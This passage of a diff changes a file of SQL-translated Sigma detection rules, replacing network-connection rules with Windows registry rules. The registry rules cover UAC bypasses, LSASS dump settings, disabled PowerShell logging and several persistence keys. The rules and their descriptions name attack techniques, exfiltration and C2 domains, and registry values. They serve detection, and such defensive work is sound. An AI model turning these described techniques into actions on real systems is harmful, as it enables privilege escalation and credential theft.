"attack.t1127.001" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", + "status": "experimental", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.impact", - "attack.t1496" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.lateral_movement" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\edge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "status": "experimental", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_turn_on_dev_features.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort = '3389' AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (NewProcessName = '') OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "status": "experimental", + "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND 